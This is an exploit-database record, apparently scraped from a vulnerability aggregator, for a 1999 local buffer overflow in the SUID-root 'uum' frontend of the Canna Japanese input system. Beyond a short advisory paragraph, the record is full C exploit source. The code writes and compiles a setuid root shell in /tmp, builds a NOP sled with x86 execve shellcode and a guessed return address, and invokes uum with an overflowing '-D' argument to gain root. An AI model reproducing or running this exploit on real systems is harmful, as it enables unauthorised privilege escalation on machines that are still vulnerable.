{"id": "EDB-ID:19582", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - &#039;uum&#039; Local Buffer Overflow", "description": "", "published": "1999-11-02T00:00:00", "modified": "1999-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/19582", "reporter": "UNYUN", "references": [], "cvelist": ["1999-0948"], "immutableFields": [], "lastseen": "2022-01-13T06:39:03", "viewCount": 10, "enchantments": {"dependencies": {}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/19582", "sourceData": "// source: https://www.securityfocus.com/bid/757/info\r\n\r\nCanna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.\r\n\r\nCanna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romanji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.\r\n\r\nCanna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.\r\n\r\nThe Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise. \r\n\r\n/*=============================================================================\r\n /usr/bin/uum Exploit for Linux \r\n The Shadow Penguin Security (http://shadowpenguin.backsection.net)\r\n Written by\r\n UNYUN (shadowpenguin@backsection.net)\r\n =============================================================================\r\n*/\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#define RET_ADR 84\r\n#define EXP_ADR 204\r\n#define MAXBUF 300\r\n#define JMP_OFS 0x484\r\n#define NOP 0x90\r\n#define SHELL \"/tmp/pp\"\r\n#define COMPILER \"gcc\"\r\n\r\nchar exec[60]= \r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff\";\r\n\r\nchar xx[MAXBUF+1];\r\nunsigned int i,ip,sp;\r\nFILE *fp;\r\n\r\n\r\nunsigned long get_sp(void)\r\n{\r\n__asm__(\"movl %esp, %eax\");\r\n}\r\n\r\nmain()\r\n{\r\n strcat(exec,SHELL);\r\n sprintf(xx,\"%s.c\",SHELL);\r\n if ((fp=fopen(xx,\"w\"))==NULL){\r\n printf(\"Can not write to %s\\n\",xx);\r\n exit(1);\r\n }\r\n fprintf(fp,\"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\");\r\n fclose(fp);\r\n sprintf(xx,\"%s %s.c -o %s\",COMPILER,SHELL,SHELL);\r\n system(xx);\r\n\r\n sp=get_sp();\r\n memset(xx,NOP,MAXBUF);\r\n ip=sp-JMP_OFS;\r\n printf(\"Jumping address = %x\\n\",ip);\r\n xx[RET_ADR ]=ip&0xff;\r\n xx[RET_ADR+1]=(ip>>8)&0xff;\r\n xx[RET_ADR+2]=(ip>>16)&0xff;\r\n xx[RET_ADR+3]=(ip>>24)&0xff;\r\n strncpy(xx+EXP_ADR,exec,strlen(exec));\r\n xx[MAXBUF]=0;\r\n execl(\"/usr/bin/uum\",\"uum\",\"-D\",xx,(char *) 0);\r\n}", "osvdbidlist": ["9822"], "exploitType": "local", "verified": true, "_state": {"dependencies": 1646601907}}

{}